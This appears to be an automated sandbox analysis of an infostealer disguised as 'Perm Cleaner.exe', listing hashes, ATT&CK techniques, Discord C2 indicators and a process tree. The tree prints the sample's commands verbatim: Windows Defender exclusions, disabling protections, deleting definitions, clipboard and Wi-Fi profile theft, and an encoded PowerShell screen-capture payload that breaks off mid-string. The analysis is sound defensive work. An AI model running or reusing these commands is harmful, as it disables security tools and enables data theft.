e4b15ff839dbbc3fd19d098e670fb1798bcd270dce3d823b4fb890b9804e8336

Analysis

max time kernel
1049s
max time network
990s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
09-12-2024 09:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Perm Cleaner.exe
Size

5.9MB
MD5

47ca4ccf141e90e9cdd7563e66353cd1
SHA1

442e4ff8c1dcb21b86fa51dae4e9590376acd069
SHA256

e4b15ff839dbbc3fd19d098e670fb1798bcd270dce3d823b4fb890b9804e8336
SHA512

a228a48f8e46fe640916e1a18597be0d04254f4d6abd5b4da78673d473a196c418c68ff9ff60c76392e96a1b862035a7bede7518562593d2640b6b692fc9ddec
SSDEEP

98304:+DmoDUN43WlmmojOjFgFEblNHYSxTpirSHcUR43zrwkdA8QJCKC7bN3mb6a+tMhz:+DumW4OjmFwDRxtYSHdK34kdai7bN3m3

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1924	powershell.exe
3756	powershell.exe
4872	powershell.exe
3356	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
2424	cmd.exe
1060	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4260	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
2884	Perm Cleaner.exe
2884	Perm Cleaner.exe
2884	Perm Cleaner.exe
2884	Perm Cleaner.exe
2884	Perm Cleaner.exe
2884	Perm Cleaner.exe
2884	Perm Cleaner.exe
2884	Perm Cleaner.exe
2884	Perm Cleaner.exe
2884	Perm Cleaner.exe
2884	Perm Cleaner.exe
2884	Perm Cleaner.exe
2884	Perm Cleaner.exe
2884	Perm Cleaner.exe
2884	Perm Cleaner.exe
2884	Perm Cleaner.exe
2884	Perm Cleaner.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
1	discord.com
4	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
4528	tasklist.exe
4420	tasklist.exe
5112	tasklist.exe

UPX packed file 60 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x001900000002ab9d-21.dat	upx
behavioral2/memory/2884-24-0x00007FFFCB6F0000-0x00007FFFCBB56000-memory.dmp	upx
behavioral2/files/0x001900000002ab8b-27.dat	upx
behavioral2/memory/2884-30-0x00007FFFDFD60000-0x00007FFFDFD84000-memory.dmp	upx
behavioral2/files/0x001900000002ab99-29.dat	upx
behavioral2/memory/2884-32-0x00007FFFE68E0000-0x00007FFFE68EF000-memory.dmp	upx
behavioral2/files/0x004600000002aba0-38.dat	upx
behavioral2/files/0x001900000002ab8e-44.dat	upx
behavioral2/files/0x001900000002ab91-47.dat	upx
behavioral2/files/0x001900000002ab93-48.dat	upx
behavioral2/files/0x001900000002ab90-46.dat	upx
behavioral2/files/0x001900000002ab8f-45.dat	upx
behavioral2/files/0x001900000002ab8d-43.dat	upx
behavioral2/files/0x001900000002ab8c-42.dat	upx
behavioral2/files/0x001a00000002ab8a-41.dat	upx
behavioral2/files/0x001c00000002aba4-40.dat	upx
behavioral2/files/0x001900000002aba3-39.dat	upx
behavioral2/files/0x001900000002ab9a-35.dat	upx
behavioral2/files/0x001c00000002ab98-34.dat	upx
behavioral2/memory/2884-54-0x00007FFFDD3D0000-0x00007FFFDD3FC000-memory.dmp	upx
behavioral2/memory/2884-56-0x00007FFFE21B0000-0x00007FFFE21C8000-memory.dmp	upx
behavioral2/memory/2884-58-0x00007FFFE2030000-0x00007FFFE204F000-memory.dmp	upx
behavioral2/memory/2884-60-0x00007FFFDCAD0000-0x00007FFFDCC4A000-memory.dmp	upx
behavioral2/memory/2884-62-0x00007FFFE11B0000-0x00007FFFE11C9000-memory.dmp	upx
behavioral2/memory/2884-64-0x00007FFFE14A0000-0x00007FFFE14AD000-memory.dmp	upx
behavioral2/memory/2884-66-0x00007FFFDCAA0000-0x00007FFFDCACE000-memory.dmp	upx
behavioral2/memory/2884-70-0x00007FFFCB6F0000-0x00007FFFCBB56000-memory.dmp	upx
behavioral2/memory/2884-72-0x00007FFFCB370000-0x00007FFFCB6E9000-memory.dmp	upx
behavioral2/memory/2884-74-0x00007FFFDFD60000-0x00007FFFDFD84000-memory.dmp	upx
behavioral2/memory/2884-71-0x00007FFFDC9E0000-0x00007FFFDCA98000-memory.dmp	upx
behavioral2/memory/2884-82-0x00007FFFDC7A0000-0x00007FFFDC8B8000-memory.dmp	upx
behavioral2/memory/2884-81-0x00007FFFE21B0000-0x00007FFFE21C8000-memory.dmp	upx
behavioral2/memory/2884-79-0x00007FFFE1420000-0x00007FFFE142D000-memory.dmp	upx
behavioral2/memory/2884-78-0x00007FFFDD3D0000-0x00007FFFDD3FC000-memory.dmp	upx
behavioral2/memory/2884-76-0x00007FFFDFD40000-0x00007FFFDFD55000-memory.dmp	upx
behavioral2/memory/2884-156-0x00007FFFE2030000-0x00007FFFE204F000-memory.dmp	upx
behavioral2/memory/2884-197-0x00007FFFDCAD0000-0x00007FFFDCC4A000-memory.dmp	upx
behavioral2/memory/2884-248-0x00007FFFE11B0000-0x00007FFFE11C9000-memory.dmp	upx
behavioral2/memory/2884-262-0x00007FFFDCAA0000-0x00007FFFDCACE000-memory.dmp	upx
behavioral2/memory/2884-278-0x00007FFFCB370000-0x00007FFFCB6E9000-memory.dmp	upx
behavioral2/memory/2884-277-0x00007FFFDC9E0000-0x00007FFFDCA98000-memory.dmp	upx
behavioral2/memory/2884-299-0x00007FFFCB6F0000-0x00007FFFCBB56000-memory.dmp	upx
behavioral2/memory/2884-305-0x00007FFFDCAD0000-0x00007FFFDCC4A000-memory.dmp	upx
behavioral2/memory/2884-304-0x00007FFFE2030000-0x00007FFFE204F000-memory.dmp	upx
behavioral2/memory/2884-300-0x00007FFFDFD60000-0x00007FFFDFD84000-memory.dmp	upx
behavioral2/memory/2884-337-0x00007FFFDCAA0000-0x00007FFFDCACE000-memory.dmp	upx
behavioral2/memory/2884-339-0x00007FFFCB370000-0x00007FFFCB6E9000-memory.dmp	upx
behavioral2/memory/2884-338-0x00007FFFDC9E0000-0x00007FFFDCA98000-memory.dmp	upx
behavioral2/memory/2884-336-0x00007FFFE14A0000-0x00007FFFE14AD000-memory.dmp	upx
behavioral2/memory/2884-335-0x00007FFFE11B0000-0x00007FFFE11C9000-memory.dmp	upx
behavioral2/memory/2884-334-0x00007FFFDCAD0000-0x00007FFFDCC4A000-memory.dmp	upx
behavioral2/memory/2884-333-0x00007FFFE2030000-0x00007FFFE204F000-memory.dmp	upx
behavioral2/memory/2884-332-0x00007FFFE21B0000-0x00007FFFE21C8000-memory.dmp	upx
behavioral2/memory/2884-331-0x00007FFFDD3D0000-0x00007FFFDD3FC000-memory.dmp	upx
behavioral2/memory/2884-330-0x00007FFFE68E0000-0x00007FFFE68EF000-memory.dmp	upx
behavioral2/memory/2884-328-0x00007FFFDC7A0000-0x00007FFFDC8B8000-memory.dmp	upx
behavioral2/memory/2884-327-0x00007FFFE1420000-0x00007FFFE142D000-memory.dmp	upx
behavioral2/memory/2884-326-0x00007FFFDFD40000-0x00007FFFDFD55000-memory.dmp	upx
behavioral2/memory/2884-329-0x00007FFFDFD60000-0x00007FFFDFD84000-memory.dmp	upx
behavioral2/memory/2884-314-0x00007FFFCB6F0000-0x00007FFFCBB56000-memory.dmp	upx

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
1864	cmd.exe
1028	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4464	WMIC.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4744	systeminfo.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133782099298377186"	chrome.exe

Suspicious behavior: EnumeratesProcesses 24 IoCs

pid	Process
3756	powershell.exe
1924	powershell.exe
3756	powershell.exe
1924	powershell.exe
4540	powershell.exe
4540	powershell.exe
1060	powershell.exe
1060	powershell.exe
4540	powershell.exe
1060	powershell.exe
4872	powershell.exe
4872	powershell.exe
1636	powershell.exe
1636	powershell.exe
3356	powershell.exe
3356	powershell.exe
4980	powershell.exe
4980	powershell.exe
3700	chrome.exe
3700	chrome.exe
3812	chrome.exe
3812	chrome.exe
3812	chrome.exe
3812	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

pid	Process
3700	chrome.exe
3700	chrome.exe
3700	chrome.exe
3700	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3756	powershell.exe
Token: SeDebugPrivilege	1924	powershell.exe
Token: SeDebugPrivilege	4528	tasklist.exe
Token: SeDebugPrivilege	4420	tasklist.exe
Token: SeIncreaseQuotaPrivilege	4044	WMIC.exe
Token: SeSecurityPrivilege	4044	WMIC.exe
Token: SeTakeOwnershipPrivilege	4044	WMIC.exe
Token: SeLoadDriverPrivilege	4044	WMIC.exe
Token: SeSystemProfilePrivilege	4044	WMIC.exe
Token: SeSystemtimePrivilege	4044	WMIC.exe
Token: SeProfSingleProcessPrivilege	4044	WMIC.exe
Token: SeIncBasePriorityPrivilege	4044	WMIC.exe
Token: SeCreatePagefilePrivilege	4044	WMIC.exe
Token: SeBackupPrivilege	4044	WMIC.exe
Token: SeRestorePrivilege	4044	WMIC.exe
Token: SeShutdownPrivilege	4044	WMIC.exe
Token: SeDebugPrivilege	4044	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4044	WMIC.exe
Token: SeRemoteShutdownPrivilege	4044	WMIC.exe
Token: SeUndockPrivilege	4044	WMIC.exe
Token: SeManageVolumePrivilege	4044	WMIC.exe
Token: 33	4044	WMIC.exe
Token: 34	4044	WMIC.exe
Token: 35	4044	WMIC.exe
Token: 36	4044	WMIC.exe
Token: SeDebugPrivilege	5112	tasklist.exe
Token: SeDebugPrivilege	4540	powershell.exe
Token: SeIncreaseQuotaPrivilege	4044	WMIC.exe
Token: SeSecurityPrivilege	4044	WMIC.exe
Token: SeTakeOwnershipPrivilege	4044	WMIC.exe
Token: SeLoadDriverPrivilege	4044	WMIC.exe
Token: SeSystemProfilePrivilege	4044	WMIC.exe
Token: SeSystemtimePrivilege	4044	WMIC.exe
Token: SeProfSingleProcessPrivilege	4044	WMIC.exe
Token: SeIncBasePriorityPrivilege	4044	WMIC.exe
Token: SeCreatePagefilePrivilege	4044	WMIC.exe
Token: SeBackupPrivilege	4044	WMIC.exe
Token: SeRestorePrivilege	4044	WMIC.exe
Token: SeShutdownPrivilege	4044	WMIC.exe
Token: SeDebugPrivilege	4044	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4044	WMIC.exe
Token: SeRemoteShutdownPrivilege	4044	WMIC.exe
Token: SeUndockPrivilege	4044	WMIC.exe
Token: SeManageVolumePrivilege	4044	WMIC.exe
Token: 33	4044	WMIC.exe
Token: 34	4044	WMIC.exe
Token: 35	4044	WMIC.exe
Token: 36	4044	WMIC.exe
Token: SeDebugPrivilege	1060	powershell.exe
Token: SeDebugPrivilege	4872	powershell.exe
Token: SeDebugPrivilege	1636	powershell.exe
Token: SeIncreaseQuotaPrivilege	4516	WMIC.exe
Token: SeSecurityPrivilege	4516	WMIC.exe
Token: SeTakeOwnershipPrivilege	4516	WMIC.exe
Token: SeLoadDriverPrivilege	4516	WMIC.exe
Token: SeSystemProfilePrivilege	4516	WMIC.exe
Token: SeSystemtimePrivilege	4516	WMIC.exe
Token: SeProfSingleProcessPrivilege	4516	WMIC.exe
Token: SeIncBasePriorityPrivilege	4516	WMIC.exe
Token: SeCreatePagefilePrivilege	4516	WMIC.exe
Token: SeBackupPrivilege	4516	WMIC.exe
Token: SeRestorePrivilege	4516	WMIC.exe
Token: SeShutdownPrivilege	4516	WMIC.exe
Token: SeDebugPrivilege	4516	WMIC.exe

Suspicious use of FindShellTrayWindow 26 IoCs

pid	Process
3700	chrome.exe
3700	chrome.exe
3700	chrome.exe
3700	chrome.exe
3700	chrome.exe
3700	chrome.exe
3700	chrome.exe
3700	chrome.exe
3700	chrome.exe
3700	chrome.exe
3700	chrome.exe
3700	chrome.exe
3700	chrome.exe
3700	chrome.exe
3700	chrome.exe
3700	chrome.exe
3700	chrome.exe
3700	chrome.exe
3700	chrome.exe
3700	chrome.exe
3700	chrome.exe
3700	chrome.exe
3700	chrome.exe
3700	chrome.exe
3700	chrome.exe
3700	chrome.exe

Suspicious use of SendNotifyMessage 12 IoCs

pid	Process
3700	chrome.exe
3700	chrome.exe
3700	chrome.exe
3700	chrome.exe
3700	chrome.exe
3700	chrome.exe
3700	chrome.exe
3700	chrome.exe
3700	chrome.exe
3700	chrome.exe
3700	chrome.exe
3700	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4936 wrote to memory of 2884	4936	Perm Cleaner.exe	78
PID 4936 wrote to memory of 2884	4936	Perm Cleaner.exe	78
PID 2884 wrote to memory of 5072	2884	Perm Cleaner.exe	79
PID 2884 wrote to memory of 5072	2884	Perm Cleaner.exe	79
PID 2884 wrote to memory of 4880	2884	Perm Cleaner.exe	80
PID 2884 wrote to memory of 4880	2884	Perm Cleaner.exe	80
PID 5072 wrote to memory of 1924	5072	cmd.exe	83
PID 5072 wrote to memory of 1924	5072	cmd.exe	83
PID 4880 wrote to memory of 3756	4880	cmd.exe	84
PID 4880 wrote to memory of 3756	4880	cmd.exe	84
PID 2884 wrote to memory of 4800	2884	Perm Cleaner.exe	85
PID 2884 wrote to memory of 4800	2884	Perm Cleaner.exe	85
PID 2884 wrote to memory of 1328	2884	Perm Cleaner.exe	86
PID 2884 wrote to memory of 1328	2884	Perm Cleaner.exe	86
PID 4800 wrote to memory of 4528	4800	cmd.exe	89
PID 4800 wrote to memory of 4528	4800	cmd.exe	89
PID 1328 wrote to memory of 4420	1328	cmd.exe	90
PID 1328 wrote to memory of 4420	1328	cmd.exe	90
PID 2884 wrote to memory of 2748	2884	Perm Cleaner.exe	91
PID 2884 wrote to memory of 2748	2884	Perm Cleaner.exe	91
PID 2884 wrote to memory of 2424	2884	Perm Cleaner.exe	92
PID 2884 wrote to memory of 2424	2884	Perm Cleaner.exe	92
PID 2884 wrote to memory of 2076	2884	Perm Cleaner.exe	94
PID 2884 wrote to memory of 2076	2884	Perm Cleaner.exe	94
PID 2884 wrote to memory of 3060	2884	Perm Cleaner.exe	98
PID 2884 wrote to memory of 3060	2884	Perm Cleaner.exe	98
PID 2884 wrote to memory of 1864	2884	Perm Cleaner.exe	100
PID 2884 wrote to memory of 1864	2884	Perm Cleaner.exe	100
PID 2884 wrote to memory of 1368	2884	Perm Cleaner.exe	101
PID 2884 wrote to memory of 1368	2884	Perm Cleaner.exe	101
PID 2884 wrote to memory of 2008	2884	Perm Cleaner.exe	103
PID 2884 wrote to memory of 2008	2884	Perm Cleaner.exe	103
PID 3060 wrote to memory of 3976	3060	cmd.exe	106
PID 3060 wrote to memory of 3976	3060	cmd.exe	106
PID 2748 wrote to memory of 4044	2748	cmd.exe	107
PID 2748 wrote to memory of 4044	2748	cmd.exe	107
PID 1864 wrote to memory of 1028	1864	cmd.exe	108
PID 1864 wrote to memory of 1028	1864	cmd.exe	108
PID 2424 wrote to memory of 1060	2424	cmd.exe	109
PID 2424 wrote to memory of 1060	2424	cmd.exe	109
PID 2076 wrote to memory of 5112	2076	cmd.exe	110
PID 2076 wrote to memory of 5112	2076	cmd.exe	110
PID 2008 wrote to memory of 4540	2008	cmd.exe	111
PID 2008 wrote to memory of 4540	2008	cmd.exe	111
PID 1368 wrote to memory of 4744	1368	cmd.exe	112
PID 1368 wrote to memory of 4744	1368	cmd.exe	112
PID 2884 wrote to memory of 1564	2884	Perm Cleaner.exe	113
PID 2884 wrote to memory of 1564	2884	Perm Cleaner.exe	113
PID 1564 wrote to memory of 5092	1564	cmd.exe	115
PID 1564 wrote to memory of 5092	1564	cmd.exe	115
PID 2884 wrote to memory of 4052	2884	Perm Cleaner.exe	116
PID 2884 wrote to memory of 4052	2884	Perm Cleaner.exe	116
PID 4052 wrote to memory of 2512	4052	cmd.exe	118
PID 4052 wrote to memory of 2512	4052	cmd.exe	118
PID 2884 wrote to memory of 4288	2884	Perm Cleaner.exe	119
PID 2884 wrote to memory of 4288	2884	Perm Cleaner.exe	119
PID 4288 wrote to memory of 3440	4288	cmd.exe	135
PID 4288 wrote to memory of 3440	4288	cmd.exe	135
PID 2884 wrote to memory of 2692	2884	Perm Cleaner.exe	123
PID 2884 wrote to memory of 2692	2884	Perm Cleaner.exe	123
PID 4540 wrote to memory of 2956	4540	powershell.exe	122
PID 4540 wrote to memory of 2956	4540	powershell.exe	122
PID 2692 wrote to memory of 1888	2692	cmd.exe	125
PID 2692 wrote to memory of 1888	2692	cmd.exe	125

C:\Users\Admin\AppData\Local\Temp\Perm Cleaner.exe
"C:\Users\Admin\AppData\Local\Temp\Perm Cleaner.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4936
- C:\Users\Admin\AppData\Local\Temp\Perm Cleaner.exe
  "C:\Users\Admin\AppData\Local\Temp\Perm Cleaner.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2884
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Perm Cleaner.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5072
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Perm Cleaner.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4880
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4800
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1328
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2748
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4044
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:2424
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2076
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:5112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3060
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3976
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:1864
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:1028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1368
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:4744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQB